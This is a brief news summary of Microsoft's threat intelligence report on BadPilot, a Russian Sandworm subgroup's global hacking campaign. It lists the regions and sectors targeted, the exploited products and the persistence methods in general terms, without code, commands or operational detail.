A subgroup of the Russian state-sponsored hacking group Sandworm has been conducting a global cyber operation called BadPilot since late 2021. Microsoft’s Threat Intelligence team reports that this campaign has significantly expanded the group’s reach beyond its traditional Eastern European targets.

Global Impact and Targeting
The operation spans multiple continents, affecting:
– North America
– Europe
– Asia-Pacific
– Africa
– South America

Key sectors targeted include:
– Energy
– Oil and gas
– Telecommunications
– Shipping
– Arms manufacturing
– Government institutions

Technical Operations
The group exploits various vulnerabilities, including:
– Microsoft Exchange Server
– Zimbra Collaboration
– Fortinet FortiClient EMS
– ConnectWise ScreenConnect
– JetBrains TeamCity

Persistence Methods:
1. Deployment of legitimate remote access software (Atera Agent, Splashtop)
2. Implementation of LocalOlive web shell
3. Modification of Outlook Web Access pages

Recent Developments
– The group has increasingly utilized criminal marketplaces for tools and infrastructure
– New malware variants include BACKORDER and Kalambur
– Exploitation of pirated software, particularly in Ukraine
– Use of TOR network for command-and-control operations

Microsoft notes that this expansion in Sandworm’s operations provides Russia with enhanced opportunities for targeted cyber operations, representing a significant evolution in their capabilities and reach.